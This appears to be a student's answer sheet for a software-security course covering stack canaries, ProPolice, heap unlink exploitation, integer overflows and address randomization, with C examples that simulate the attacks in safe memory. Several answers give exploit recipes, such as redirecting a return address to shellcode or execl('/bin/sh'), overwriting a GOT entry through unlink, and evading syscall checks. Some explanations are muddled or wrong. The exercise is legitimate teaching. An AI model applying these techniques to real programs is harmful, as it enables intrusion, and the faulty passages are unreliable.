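```c
/* Added example (not from the original answer sheet): the "double pointer"
 * canary bypass of 34(d), replayed inside a struct instead of a live stack. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define USER_LEN 512

struct frame {
    char      user[USER_LEN];   /* overflowable buffer, lowest address */
    char     *nbuf;             /* pointer local: the first thing the overflow reaches */
    uintptr_t canary;           /* Stackguard's random word, right below the saved BP */
    uintptr_t saved_bp;
    uintptr_t ret;              /* return address: what the attacker wants */
};

/* Mirrors auth(): copy username into user, then pass through nbuf. The first
 * copy targets the frame's base address so that running past user is still
 * a write inside the same object, as a stack overflow is inside the stack. */
static void auth_sim(struct frame *f, const char *username, size_t ulen,
                     const char *pass, size_t plen) {
    memcpy((unsigned char *)f, username, ulen);   /* bcopy(username, user, ulen) */
    memcpy(f->nbuf, pass, plen);                  /* bcopy(pass, nbuf, plen)     */
}

/* Runs the attack; reports the final return address and canary.
 * Returns 1 if the return address was redirected while the canary survived. */
int double_pointer_attack(uintptr_t *new_ret_out, uintptr_t *canary_out) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary   = 0x5a17c0de;        /* stands in for the random canary */
    f.saved_bp = 0x1000;
    f.ret      = 0x2000;            /* legitimate return address */

    /* username: 512 filler bytes, then the address of the RA slot, which
     * lands exactly on nbuf. Nothing beyond nbuf is written. */
    unsigned char username[USER_LEN + sizeof(char *)];
    memset(username, 'A', USER_LEN);
    char *ra_slot = (char *)&f.ret;
    memcpy(username + USER_LEN, &ra_slot, sizeof ra_slot);

    /* pass: the value to plant in the RA. In the real attack this is the
     * address of the NOP sled at the start of user; here a marker. */
    uintptr_t evil = 0xbadc0de;
    auth_sim(&f, (const char *)username, sizeof username,
             (const char *)&evil, sizeof evil);

    *new_ret_out = f.ret;
    *canary_out  = f.canary;
    return f.ret == evil && f.canary == 0x5a17c0de;
}

int main(void) {
    uintptr_t ret, canary;
    int ok = double_pointer_attack(&ret, &canary);
    printf("return address 0x%lx, canary 0x%lx, RA hijacked with canary intact: %d\n",
           (unsigned long)ret, (unsigned long)canary, ok);
    return 0;
}
```

The same layout explains (e): if nbuf were placed below user instead of above it, the first memcpy could never reach it, and the second copy would go to the heap block nbuf really points to.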
The value carried in pass is whatever the attacker wants in the return address: the sled in user, as above, if the stack is executable; or, as in (c), the address of execl. In the latter case plen is made larger so that the same copy also lays out execl's fake frame (a return address, two pointers to "/bin/sh" and the terminating 0) in the words above the return address, none of which lie below the canary.

3) Other attacks Stackguard does not stop: format string bugs and other arbitrary writes that do not pass through the canary; a canary whose value can be predicted or read (it is only as good as its random source); heap overflows; and overwritten function pointers or C++ virtual table entries, which are not behind any canary.

-------------------------------------------------------------------------
(e) (ATTACKING WITH CANARY) Show how to modify the attack of (d) to work with ProPolice; or argue that it is not possible.

ProPolice (the GCC stack protector) keeps the canary next to the saved BP and adds two changes: (1) the locals are reordered so that character arrays sit immediately below the canary and all pointers and scalars sit below the arrays, so an overflow of an array cannot corrupt another local; (2) pointer arguments are copied into the local area below the arrays, so they cannot be corrupted either. For auth the frame becomes:

    ---------------------------
    | return address          |  BP+4
    ---------------------------
    | saved BP                |  BP+0
    ---------------------------
    | canary                  |  BP-4
    ---------------------------
    | user[511] .. user[0]    |  BP-8 .. BP-2052
    ---------------------------
    | nbuf                    |  BP-2056
    ---------------------------
    | copies of username, pass|  below that
    ---------------------------

Now nbuf lies below user, so the first bcopy cannot reach it: the only things an overflow of user can overwrite are the canary, the saved BP, the return address and the arguments, and every one of them is behind the canary. The second bcopy therefore writes into the block nbuf really points to (the malloc'd buffer), not into the frame. The attack of (d) is not possible here: the attacker can still place shellcode in user, but has no pointer to redirect and cannot change the return address or the saved BP without being caught by the canary check. (Other avenues, such as an overflow of the heap block that nbuf points to, are outside this frame and outside the exercise.)

-------------------------------------------------------------------------
(f) (SECOND COPY RA, OVERWRITING SBP) Modify the attack in (d) so that it works against a stack-smashing defense that does not use canaries, but relies on a second copy that is saved elsewhere in memory.
If there are additional assumptions that need to be made in order to craft a successful attack, identify them.

    ---------------------------
    | return address          |  BP+4    = 0xb11114   compared with the copy before ret
    ---------------------------
    | saved BP                |  BP+0    = 0xb11110   NOT covered by the copy
    ---------------------------
    | nbuf                    |  BP-4    = 0xb1110c
    ---------------------------
    | user[511] .. user[0]    |  BP-2052 = 0xb1090c ..
    ---------------------------
            ...
    ---------------------------
    | copy of return address  |  somewhere else (a shadow stack or a per-call save area)
    ---------------------------

The defense compares the return address on the stack with its copy just before ret, so the attack of (d), which changes only the stack copy, is detected. Two ways around it:

1) Leave the return address alone: the saved BP is not protected. Reuse (b): either the first bcopy overwrites user, nbuf and the saved BP (a username of 2056 bytes) and stops, or, keeping the shape of (d), the first bcopy sets nbuf to the address of the saved BP (0xb11110) and the second bcopy writes the fake frame base F = 0xb1091c there. After the return, g reads s1 and s2 from the attacker's fake frame inside user and execl(s2, s2, 0) runs "/bin/sh". No code is injected, so a non-executable stack does not matter. Assumptions: the defense checks only the return address (not the saved BP and not g's locals); g accesses s1 and s2 through BP; the exact base address is known.

2) Corrupt the copy as well: if the second copy is kept in ordinary writable memory at an address the attacker can find (no randomization, and the save area is not write-protected between function entry and exit), set nbuf to that address in the first overflow and write the same bogus return address to both places, so that the comparison succeeds. Assumptions: the location of the copy is known and writable from the victim process.

If the stack is non-executable and variant 1 is blocked, the usual fallback is to place the payload in the heap and redirect a function pointer, or to return into libc as in (c), rather than return into the stack.

***********************************************************************
35) HEAP OVERFLOW

Here is a possible implementation of heap management routines. Assume that heap blocks are declared as C-style structures. Assume that block sizes are a power of two.
Blocks of the same size are linked together using prev and next fields:

    struct heap_block {
        bool in_use;          // false when a block is in some free list; true otherwise   (offset 0, padded to 4 bytes)
        unsigned size;        // size of this block                                       (offset 4)
        unsigned prev_size;   // size of previous block                                   (offset 8)
        heap_block *prev;     //                                                          (offset 12)
        heap_block *next;     //                                                          (offset 16)
    };

(The offsets follow from free() below, which recovers the header from the user pointer as b - 12: the user pointer is &prev, so in_use, size and prev_size occupy the 12 bytes before it, and with 4-byte pointers the whole header is 20 bytes.)

Depending on the size of the block, there will be 0 or more bytes of data in a heap block that follow the above bytes, but the structure declaration above does not need to include them since they are never accessed by the heap management routines. When malloc is called, assume that the memory manager simply goes to the free list corresponding to the block size requested, and returns the first element as follows:

    (MALLOC: SEARCH FREE LIST FOR USABLE MEMORY BLOCK)
    heap_block *current = head;
    head = head->next;                  // remove first element from this free list
    return (char *)(&current->prev);

Note that malloc returns a pointer corresponding to the "prev" field: the block is no longer on any free list, so the prev and next fields can now be used to store user data. However, the in_use, size and prev_size fields are still used to support "coalescing" of adjacent free blocks. When a block is freed using free(b), its adjacent blocks' status is checked as follows:

    (FREE: PUT BLOCK ONTO THE HEAD OF THE FREE LIST)
    heap_block *h = (heap_block *)(b - 12);                 // hack to compute base of header
    heap_block *n = (heap_block *)(b - 12 + h->size);       // physically next block
    heap_block *p = (heap_block *)(b - 12 - h->prev_size);  // physically previous block
    if (!n->in_use) {
        n->prev->next = n->next;    // unlink n from its free list: two writes
        n->next->prev = n->prev;    // through pointers read from n's header
        ....
        .... combine h & n into one block, insert into the right free list ...
    }
    if (!p->in_use) /* similar code for merging h and p */
    ....

Now, consider a heap overflow vulnerability in the code shown below:

    (HEAP OVERFLOW)
    char *b = malloc(32);
    read(fd, buf, 256);
    strcpy(b, buf);
    ...
    free(b);

-------------------------------------------------------------------------
(a) Suppose that an attacker wishes to exploit the above program using a heap overflow attack. What should the attack message being read at the second of the 4 lines of vulnerable code above? Identify any assumptions that you need to make regarding the locations of objects in memory. When is your exploit triggered?
-------------------------------------------------------------------------
malloc(32) hands out a block whose data area begins 12 bytes into the block (at &prev) and ends where the header of the physically next block begins. read() places up to 256 attacker-controlled bytes in buf, and strcpy() copies them into b with no regard for the block size, so everything from b to the end of the attacker's string is overwritten: the rest of b's data area, then the header of the next block n (its in_use, size, prev_size, prev and next fields), and beyond. b's own header lies before b and is not affected.

The exploit is triggered by free(b). free() locates n from h->size (uncorrupted), tests the attacker's n->in_use, and if it is zero "unlinks" n with the two statements n->prev->next = n->next and n->next->prev = n->prev. With prev and next under the attacker's control these are two arbitrary 4-byte writes: the first stores the value of n->next at address n->prev + 16, the second stores n->prev at address n->next + 12.
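The unlink write-what-where just described, replayed inside a simulated heap so that it can run safely. This is an added example, not part of the original answer sheet: pointers are replaced by 32-bit offsets into a byte array, which keeps the handout's header layout (in_use at 0, size at 4, prev_size at 8, prev at 12, next at 16, data at 20, so "b - 12" is the header base). The block positions (b at offset 64 with size 64, its physical neighbour n at 128), the fake GOT slot at offset 512 and the 0xdeadbeef it holds are constructed for the demonstration, and the overflowing copy is length-based (memcpy), because strcpy could not deliver the zero byte that n.in_use needs.

```c
/* Added example (not from the original answer sheet): the unlink() of
 * question 35 as an arbitrary write, on a SIMULATED heap. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_SIZE   1024
#define OFF_INUSE  0
#define OFF_SIZE   4
#define OFF_PREVSZ 8
#define OFF_PREV   12
#define OFF_NEXT   16

static uint8_t mem[MEM_SIZE];   /* the simulated heap; "addresses" are offsets into it */

static uint32_t rd32(uint32_t off) { uint32_t v; memcpy(&v, mem + off, 4); return v; }
static void     wr32(uint32_t off, uint32_t v) { memcpy(mem + off, &v, 4); }
uint32_t heap_rd32(uint32_t off) { return rd32(off); }   /* for inspection */

/* Constructed layout: three 64-byte blocks and a fake GOT entry. */
enum { BLK_A = 0, BLK_B = 64, BLK_N = 128, BLK_SIZE = 64, FAKE_GOT = 512 };
enum { B_DATA = BLK_B + OFF_PREV };   /* what malloc(32) returned: &b->prev == 76 */

static void make_block(uint32_t base, uint32_t in_use, uint32_t prev_size) {
    wr32(base + OFF_INUSE, in_use);
    wr32(base + OFF_SIZE, BLK_SIZE);
    wr32(base + OFF_PREVSZ, prev_size);
    wr32(base + OFF_PREV, 0);
    wr32(base + OFF_NEXT, 0);
}

void setup_heap(void) {
    memset(mem, 0, sizeof mem);
    make_block(BLK_A, 1, 0);          /* in-use block below b: no merge with p */
    make_block(BLK_B, 1, BLK_SIZE);   /* the block returned by malloc(32) */
    make_block(BLK_N, 1, BLK_SIZE);   /* the block physically after it */
    wr32(FAKE_GOT, 0xdeadbeefu);      /* "address" of a library function */
}

/* The handout's free(): only the unlink of n is modelled, since that is
 * where the two attacker-steered writes happen. */
void sim_free(uint32_t b) {
    uint32_t h = b - 12;
    uint32_t n = h + rd32(h + OFF_SIZE);
    uint32_t p = h - rd32(h + OFF_PREVSZ);
    if (!rd32(n + OFF_INUSE)) {
        wr32(rd32(n + OFF_PREV) + OFF_NEXT, rd32(n + OFF_NEXT));   /* n->prev->next = n->next */
        wr32(rd32(n + OFF_NEXT) + OFF_PREV, rd32(n + OFF_PREV));   /* n->next->prev = n->prev */
    }
    if (!rd32(p + OFF_INUSE)) {
        /* merge with p: not reached, BLK_A is marked in use */
    }
}

/* Attack message: fill b's data area up to n's header, then a forged header
 * whose prev/next make the unlink store `next` at mem[prev + 16]. */
size_t build_attack(uint8_t *out) {
    size_t data_len = BLK_N - B_DATA;              /* 52 bytes until n's header */
    memset(out, 0x90, data_len);                   /* stands in for jmp + shellcode */
    uint32_t fake[5] = {
        0,                      /* in_use = 0: make free() merge with n   */
        BLK_SIZE,               /* size: keep it plausible               */
        BLK_SIZE,               /* prev_size                             */
        FAKE_GOT - OFF_NEXT,    /* prev: target - 16                     */
        B_DATA                  /* next: where the "shellcode" lives     */
    };
    memcpy(out + data_len, fake, sizeof fake);
    return data_len + sizeof fake;
}

void overflow_and_free(void) {
    uint8_t msg[256];
    size_t len = build_attack(msg);
    memcpy(mem + B_DATA, msg, len);   /* the overflowing copy into b */
    sim_free(B_DATA);                 /* the trigger */
}

int main(void) {
    setup_heap();
    printf("GOT slot before free: 0x%08x\n", heap_rd32(FAKE_GOT));
    overflow_and_free();
    printf("GOT slot after free : 0x%08x  (offset of b's data = shellcode)\n", heap_rd32(FAKE_GOT));
    printf("shellcode + 12 clobbered with 0x%08x (target - 16)\n", heap_rd32(B_DATA + 12));
    return 0;
}
```

The second write is why real shellcode for this technique starts with a short jump: bytes 12..15 of the payload are overwritten by the unlink itself.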
In normal execution, free heap blocks are doubly linked:

          ----------header--------
          |        in_use        |
          |     previous_size    |
          |         size         |
     <----|        * prev        |
          |        * next        |-----
          ------------------------    |
          |                      |    |
          |      Free space      |    |
          |                      |    |
          ------------------------    |
                                      |
          ----------header--------    |
          |        in_use        |    |
          |     previous_size    |    |
          |         size         |    |
     <----|        * prev        |<----
          |        * next        |-----
          ------------------------
          |                      |
          |      Free space      |
          |                      |
          ------------------------

When the blocks are allocated, they use the link fields for user data:

          ----------header--------
          |        in_use        |
          |     previous_size    |
          |         size         |
          ------------------------
          |      user data       |
          ------------------------

The main idea of a heap overflow is to overwrite an important variable stored after an overflowable buffer and to exploit the header, since the allocation depends on the system's memory allocator implementation. We can proceed with an attack that is triggered when the blocks are merged (making the unlinking process in free() point to our address with the attack code):

1) Controlling the content of buf (read from fd) allows us to overflow b's control information. Modifying next/prev so that free() uses them allows us to overwrite the function pointers of the functions we want. We need to corrupt the 4 bytes of next/prev and set in_use=0 (to mark the next block as free). This creates a next block, where we insert the ATTACK_CODE (for example, shell code). We also change SIZE, because consolidation jumps to the next free block based on the current block's size. We suppose buf was allocated by malloc(256); this creates a block of 4+256+4 bytes of boundary data. The size of data that can be held is 256+4=260 (prev_size of the next block, which is b). We can store our shell code in these 256 bytes.

2) We set the size of b to 16 by the overwrite, set in_use=0 and create a "next" block after it.

3) We then need to modify b's next and prev the way we want.
For this, we need to find where our function pointer is; from the function free(), we see that the offset is 12. The part of the heap management that adds/removes free blocks trusts the values in next/prev. An attack can overwrite control data in a block in the free list that is then allocated. We want to overwrite the next block as a free block with our data, and for this the heap management needs to see a correctly set header, e.g. b->next->in_use has to have the value 0 so that the "free" blocks are merged at the time free(b) is called.

4) The address of our shellcode can be written into b->next, but this has to be placed 8 bytes after the user data. Also, the shell code should begin with 8 bytes of NOP (jump instructions) leading to the 12th byte, where the shellcode is.

5) Calls in programs take place through indirect addressing to allow relocation in the system. Therefore, when a function such as read() is called, the address from the GOT is referenced, and this address contains the real address of the function to which the code jumps. A possible ASCII layout for the attack is:

<32 bytes of anything>
<4 bytes of previous_size = -16>
<4 bytes of size of this block = 0, in_use = 0>
<8 bytes of anything>
<8 bytes of NOP, pointing to the overwritten location - 12 (GOT)>
<12 bytes of anything>

6) For "anything" we should only avoid bytes that break the string, such as null, newline and carriage return. The fake heap block headers will be unlinked and the location of the shellcode will be copied to the location of the return pointer.

7) Encoded as heap structures, the message would read like "head->next = attack_next; head->prev = attack_previous; head->in_use = 0; ..., etc."

-------------------------------------------------------------------------
-------------------------------------------------------------------------
(b) Suppose a defense against heap overflow exploits is designed that is based on putting a canary before, after, or in the middle of the header structure.
Where should it be located? Why? Describe your canary-based defense in detail. Specifically, modify the definition of the heap_header structure and all the heap manipulation code given above to incorporate the canary and all the relevant checks on it.

Looking at the head assignments when we call malloc(), the line "head = head->next" is what we will corrupt later when we call free(). The canary should be located at the end of the header, so that it does not allow the junction of a fake header to an arbitrary block. The canary check could be something like this before the return:

if (canary == global_random) return; else abort();

***********************************************************************
***********************************************************************
***********************************************************************
36) INTEGER OVERFLOW

Consider a (binary) data file whose structure is as follows:

----------------------------------------------
short totalLen;        // assume 16-bits, signed
short nparts;          // assume 16-bits, signed
// Part 1 begins here
unsigned char len1;    // 8-bits
... len1 data bytes ...
// Part 2 begins here
unsigned char len1;    // 8-bits
... len1 data bytes ...
...
-------------------------------------------

Write a plausible code snippet for reading such a file that contains an integer overflow vulnerability. For full credit, (a) make your code snippet as realistic as possible; (b) if there are multiple plausible integer overflow vulnerabilities, identify them with multiple vulnerable code snippets.

Let us test this data against several forms of integer overflow. We want to check whether the total length of the file is correct (to see whether the file is corrupted, etc.).
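For part (b) of the heap overflow problem above, the canary-checked header together with the malloc and free paths written out in full, as an added example rather than the page's own code. It assumes a constructed arena of fixed-size blocks and a caller-supplied secret (global_random); hb_free() returns -1 where a production allocator would abort().

```c
/* Canary-checked heap header and malloc/free for the heap overflow problem, part (b).
 * Added example: the arena is a constructed buffer of fixed-size blocks, global_random
 * is a caller-supplied secret, and hb_free() returns -1 where a real allocator would abort(). */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ARENA_SIZE 4096
#define BLOCK_SIZE 64                 /* header + user data; one size class only */

typedef struct heap_block {
    bool in_use;
    unsigned size;                    /* size of this block, header included */
    unsigned prev_size;               /* size of the block just before it in memory */
    uint32_t canary;                  /* END of the fixed header: an overflow that reaches
                                         the next block's prev/next has to cross it first */
    struct heap_block *prev;          /* free-list links; overlaid by user data when in use */
    struct heap_block *next;
} heap_block;

static _Alignas(16) uint8_t arena[ARENA_SIZE];
static heap_block *head;              /* free list of the single size class */
static uint32_t global_random;        /* per-process secret (assumed: set by hb_init) */

#define HDR(b)  ((heap_block *)((uint8_t *)(b) - offsetof(heap_block, prev)))
#define USER(h) ((char *)&(h)->prev)

static bool canary_ok(const heap_block *h) { return h->canary == global_random; }

static void push_free(heap_block *h) {
    h->in_use = false;
    h->prev = NULL;
    h->next = head;
    if (head) head->prev = h;
    head = h;
}

static void unlink_free(heap_block *x) {
    if (x->prev) x->prev->next = x->next; else head = x->next;
    if (x->next) x->next->prev = x->prev;
}

void hb_init(uint32_t secret) {
    global_random = secret;           /* a real allocator would draw this from a CSPRNG */
    head = NULL;
    for (size_t off = 0; off + BLOCK_SIZE <= ARENA_SIZE; off += BLOCK_SIZE) {
        heap_block *h = (heap_block *)(arena + off);
        h->size = BLOCK_SIZE;
        h->prev_size = off ? BLOCK_SIZE : 0;
        h->canary = global_random;
        push_free(h);
    }
}

/* MALLOC: take the first free block, but only after its header checks out. */
char *hb_malloc(void) {
    heap_block *current = head;
    if (!current || !canary_ok(current)) return NULL;   /* NULL stands in for abort() */
    head = head->next;                /* remove first element from this free list */
    if (head) head->prev = NULL;
    current->in_use = true;
    return USER(current);             /* user data starts at the prev field, as on the page */
}

/* FREE: h, its memory successor n and its predecessor p are all checked BEFORE any
 * unlink step trusts their prev/next fields. Returns 0, or -1 on a corrupted header. */
int hb_free(char *b) {
    heap_block *h = HDR(b);
    if (!canary_ok(h) || !h->in_use) return -1;
    uint8_t *base = (uint8_t *)h;
    heap_block *n = (base + h->size < arena + ARENA_SIZE) ? (heap_block *)(base + h->size) : NULL;
    heap_block *p = h->prev_size ? (heap_block *)(base - h->prev_size) : NULL;
    if ((n && !canary_ok(n)) || (p && !canary_ok(p))) return -1;
    if (n && !n->in_use) {            /* coalesce forward: safe, n's canary was intact */
        unlink_free(n);
        h->size += n->size;
    }
    if (p && !p->in_use) {            /* coalesce backward */
        unlink_free(p);
        p->size += h->size;
        h = p;
    }
    base = (uint8_t *)h;              /* keep the successor's prev_size consistent */
    if (base + h->size < arena + ARENA_SIZE)
        ((heap_block *)(base + h->size))->prev_size = h->size;
    push_free(h);
    return 0;
}

/* Reports whether a block's header is still intact, without trusting its pointers. */
bool hb_header_intact(const char *b) { return canary_ok(HDR(b)); }
```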
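A reader for this file layout that does the length arithmetic without narrowing, as an added example (not from the original answer) for contrast with the three attempts that follow; the file image with its three parts is constructed inline, and naive_calc_total() reproduces the 16-bit product the second attempt relies on.

```c
/* Checked reader for the problem-36 file layout.  Added example, not the page's code:
 * the file image is constructed in memory, every count is widened to size_t before
 * arithmetic, the buffer bound is checked before each read, and the parts are walked
 * one by one instead of assuming that every len byte is equal. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum file_status { FILE_OK, FILE_TOO_SHORT, FILE_BAD_COUNT, FILE_TRUNCATED_PART, FILE_LEN_MISMATCH };

/* 16-bit signed little-endian header field. */
static int16_t rd16(const uint8_t *p) {
    return (int16_t)((uint16_t)p[0] | ((uint16_t)p[1] << 8));
}

/* The page's attempt 2 reduced to its core: the product is computed in int and then
 * narrowed to 2 bytes, so 300 * 250 = 75000 silently becomes 9464. */
unsigned short naive_calc_total(short nparts, unsigned char len1) {
    unsigned short calc_totalLen = (unsigned short)(nparts * len1);
    return calc_totalLen;
}

/* Walks the parts and checks the total against both the header and the real size. */
enum file_status check_file(const uint8_t *buf, size_t n, size_t *total_out) {
    if (n < 4) return FILE_TOO_SHORT;
    int16_t totalLen = rd16(buf), nparts = rd16(buf + 2);
    if (totalLen < 0 || nparts < 0) return FILE_BAD_COUNT;   /* signed fields: reject, never reinterpret */
    size_t pos = 4;
    for (size_t i = 0; i < (size_t)nparts; i++) {
        if (pos >= n) return FILE_TRUNCATED_PART;
        size_t len = buf[pos++];                              /* unsigned char widened: never negative */
        if (len > n - pos) return FILE_TRUNCATED_PART;        /* pos <= n here, so no underflow */
        pos += len;
    }
    if (pos != (size_t)totalLen || pos != n) return FILE_LEN_MISMATCH;
    if (total_out) *total_out = pos;
    return FILE_OK;
}

/* Constructed sample: header plus three parts of 5, 0 and 200 bytes (212 bytes in all).
 * claimed_total is what gets written into totalLen; returns bytes written, or 0. */
size_t build_sample(uint8_t *out, size_t cap, int16_t claimed_total) {
    static const uint8_t lens[3] = { 5, 0, 200 };
    size_t pos = 4;
    if (cap < 212) return 0;
    out[0] = (uint8_t)(claimed_total & 0xff);
    out[1] = (uint8_t)((claimed_total >> 8) & 0xff);
    out[2] = 3; out[3] = 0;                                   /* nparts = 3 */
    for (int i = 0; i < 3; i++) {
        out[pos++] = lens[i];
        memset(out + pos, 'x', lens[i]);
        pos += lens[i];
    }
    return pos;
}
```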
1) In our first attempt, we make an assignment between variables of different signedness:

-----------------------------------------------------------------
short int buf_totalLen;    // 2 bytes signed: -32,768 -> +32,767
short int buf_nparts;      // 2 bytes signed: -32,768 -> +32,767
char buf_len1;             // 1 byte, signed (-128 -> 127), receiving a value that was unsigned (0 -> +255)
                           // If len1 was bigger than 127, it becomes negative here
short int calc_totalLen;   // 2 bytes signed: -32,768 -> +32,767
short int read_bytes;      // 2 bytes signed: -32,768 -> +32,767

// read totalLen
fseek(file, 0, SEEK_SET);
read_bytes = fread(&buf_totalLen, 1, sizeof(buf_totalLen), file);
// read nparts (fread advances the file position)
read_bytes = fread(&buf_nparts, 1, sizeof(buf_nparts), file);
// read the first len1
read_bytes = fread(&buf_len1, 1, sizeof(buf_len1), file);
// the file position is now where the first part starts
// it was suggested that all len1 are the same
calc_totalLen = buf_nparts * buf_len1;   // if buf_len1 was negative, calc_totalLen is now negative!

if (calc_totalLen != buf_totalLen) {
    cout << "File corrupted" << endl;
    return -1;
}
-----------------------------------------------------------------

The message "File corrupted" is going to appear every time len1 is bigger than 127, not only when the file is corrupted. When assigning an unsigned integer to a signed integer variable, if the unsigned value has a 1 in the highest bit, after the assignment the signed variable will be a negative integer.

2) In our second attempt, we decide to make everything unsigned. Since totalLen was a short int, we decide to use an unsigned short int for our calculated variables.
Now we will explicitly see the problem with the sizes of the variables, which causes an arithmetic overflow:

-----------------------------------------------------------------
short int buf_totalLen;               // 2 bytes signed: -32,768 -> +32,767
short int buf_nparts;                 // 2 bytes signed: -32,768 -> +32,767
unsigned char buf_len1;               // 1 byte unsigned: 0 -> +255
unsigned short int calc_totalLen;     // 2 bytes unsigned
unsigned short int read_bytes;        // 2 bytes unsigned

// read totalLen
fseek(file, 0, SEEK_SET);
read_bytes = fread(&buf_totalLen, 1, sizeof(buf_totalLen), file);
// read nparts
read_bytes = fread(&buf_nparts, 1, sizeof(buf_nparts), file);
// read the first len1
read_bytes = fread(&buf_len1, 1, sizeof(buf_len1), file);
// it was suggested that all len1 are the same
calc_totalLen = buf_nparts * buf_len1;
// now, if buf_nparts and buf_len1 are sufficiently big, their product needs more than
// 2 bytes, and calc_totalLen will hold the wrapped (overflowed) value

if (calc_totalLen != buf_totalLen) {
    cout << "File corrupted" << endl;
    return -1;
}
-----------------------------------------------------------------

The "File corrupted" message will also appear when there is an arithmetic overflow in calc_totalLen.

3) In our third attempt, to correct the previous problem, we decide to make calc_totalLen a long. We also want to improve our code to find which of the three sizes is wrong when we see the "File corrupted" warning, and then continue the execution of the program with real_fileLen, which is what we care about.
We will then have an assignment between variables of different width:

-----------------------------------------------------------------
1  short int buf_totalLen;       // 2 bytes signed: -32,768 -> +32,767
   short int buf_nparts;         // 2 bytes signed: -32,768 -> +32,767
   unsigned char buf_len1;       // 1 byte unsigned: 0 -> +255
   long int calc_totalLen;       // 4 bytes signed: -2,147,483,648 -> 2,147,483,647
   short int real_fileLen;       // 2 bytes signed: -32,768 -> +32,767
   short int read_bytes;         // 2 bytes signed: -32,768 -> +32,767
7  // read totalLen
   fseek(file, 0, SEEK_SET);
   read_bytes = fread(&buf_totalLen, 1, sizeof(buf_totalLen), file);
10 // read nparts
   read_bytes = fread(&buf_nparts, 1, sizeof(buf_nparts), file);
13 // read the first len1
   read_bytes = fread(&buf_len1, 1, sizeof(buf_len1), file);
16 // it was suggested that all len1 are the same
   calc_totalLen = buf_nparts * buf_len1;
18 // to see the real size
   fseek(file, 0, SEEK_END);
   real_fileLen = ftell(file);
   // let us check the three sizes
25 if (real_fileLen != calc_totalLen) {
       cout << "Real size of the file is different than the calculated file size." << endl;
27     real_fileLen = calc_totalLen;   // here we are assigning a large variable to a smaller one!!!!
   }
29 if (real_fileLen != buf_totalLen) {
       cout << "Real size of the file is different than the header value." << endl;
       real_fileLen = buf_totalLen;
   }
-----------------------------------------------------------------

If calc_totalLen is big enough, everything after line 27 is not going to work correctly because of the integer overflow (real_fileLen will always end up getting the value of buf_totalLen).

***********************************************************************
***********************************************************************
***********************************************************************
37) ADDRESS RANDOMIZATION

Suppose that address randomization is used. Explain in detail how it will (or won't) break the exploits you developed in the previous problems.
(a) Which steps in each of your exploits will be broken by a very basic absolute address randomization, which simply adds a single fixed random-valued offset to every base address of every memory region? If there are multiple steps in the exploit (e.g., a heap overflow involves 2 pointers to be corrupted), indicate whether the attacker has to have additional knowledge to defeat ASR in the subsequent steps as compared to the initial step.

ASR works against attacks that are based on pointer corruption:

1) Stack overflow: in principle, the attacker would not be able to estimate the base pointer and the location of the other pointers on the stack in order to craft the attacks of question 1. However, if she knows the address, the attacks would be exactly the same plus the offset introduced by ASR. The exception is the return-to-libc attack: it is not possible to achieve complete randomness in ASR, and some memory regions (libraries) may be required to be aligned on page boundaries, making their low bits predictable.

2) Heap overflow: involves 2 pointers to be corrupted, the first being the location of the function pointer that we want to change and the second the jump to the code. Under ASR, if the first pointer is guessed, the second is predictable, since there is only one random value (this attack already has a relative address definition).

3) Integer overflow: there are buffer overflows that go undetected because of integer overflows. However, many integer overflow vulnerabilities result in an out-of-bounds access involving a base address and an offset. This is a relative address attack, not protected by ASR.

In conclusion, the limitations of ASR are: brute force attacks, relative address attacks and information leakage attacks.
-------------------------------------------------------------------------
-------------------------------------------------------------------------
(c) How will your answer to part (a) change if relative address randomization is used?

In RAR, the relative addresses of individual code and data objects and the distances between functions are randomized.

1) Stack overflow: changing the relative addresses of existing functions matters for return-to-libc attacks. In the last item of question 1, we saw that ProPolice changes the relative order of local variables; however, this is done in a very predictable way.

2) Heap overflow: the relative distance between functions is randomized, so guessing the first pointer no longer gives the location of the second, as it did before.

***********************************************************************
***********************************************************************
***********************************************************************
38) ADDRESS RANDOMIZATION

Suppose that there is a vulnerability in a randomization-based defense that permits you to execute injected code. However, the system deploys a checker in the kernel that identifies the origin of system calls. If it is any location other than sites within standard libraries that are known to make system calls, then this checker terminates the caller.

(a) How will you work around this checker so that your code can make system calls in the presence of absolute address randomization as described in part (a) of the previous problem? Note that due to the use of ASR, your code does not know the memory locations of any data or code objects in memory, but it can access the values in the CPU registers at the point when the injected code execution begins. Hint: starting from register values, is there a way you can examine program memory to identify the locations of one or more objects in memory?
Since all addresses are absolute, if you know the offset, finding the address of one object gives the addresses of the following objects. When we debug our code, we can use the "examine" command (x in gdb) to examine memory independently of the program's data types. We can specify the address and do many operations, such as counting the number of integers from this address or printing some words of memory above a stack base pointer, and use this information to access the values of the registers where we injected our code. In other words, once we find the start address, we can find the system call by its offset and then use it, for example, in a return-to-libc call.

-------------------------------------------------------------------------
-------------------------------------------------------------------------
(c) Suppose that both relative address ASR and DSR are used. Can you modify your injected code so that it can successfully execute arbitrary system calls? How?

Yes, we can use the relative address of the target to corrupt a pointer (for example, through a wrong assignment between variables of different sizes) and then wait until the moment the program has to use the content of this pointer. This can be used in both stack and heap overflows.

***********************************************************************
***********************************************************************
***********************************************************************
39) MEMORY ERRORS

(a) Identify all possible memory errors in the program above. Your answer should take the form of annotations to the above program so that the place where the error occurs is identified, as well as its nature (spatial or temporal), together with any justification that may be necessary. Recall that in the C language, overflows from one field within a struct into the next field are permitted. You can also assume that variables are allocated in the order they are declared. For instance, r[42] will access q.
To check for memory errors in code, we look for:
- overflows of variables that are not bounds checked;
- spatial errors, i.e. out-of-bounds accesses, corrupted pointers or null pointer dereferences;
- temporal errors, i.e. dangling pointers;
- memory leaks.

All the errors below are spatial if not otherwise specified; dereferences of uninitialized or null pointers can be either temporal or spatial.

(NO BOUND CHECKING METHODS)
-----------------------------------------------------------------
union A {
  char *a;
  int b;
} aa, ab;

struct B {
  char *c;            --> Note: sizeof(c) = 1 byte
  char *c1;
  char d[30];
  int e[18];
} ba, *bb;

struct C {
  int f;              --> Note: sizeof(f) = 4 bytes
  char *f1;
  char g[30];
  int h[18];
} ca;

void freeB(struct B *p) {
  if (p->c != NULL) free(p->c);
  free(p);
}

char *ff(char *s) {
  char t[32];
  char *p;
  int i;
  for (i = 0, p = t; (p < &t[32]) && (s[i] != '\0'); i++, p++) {
      --> p = t should be p = &t[0] or *p = t[0] (if we change the next declaration); t was not
          initialized. In the DSR transformation approach it would not be necessary to assign the
          same mask to this kind of declaration (p = t).
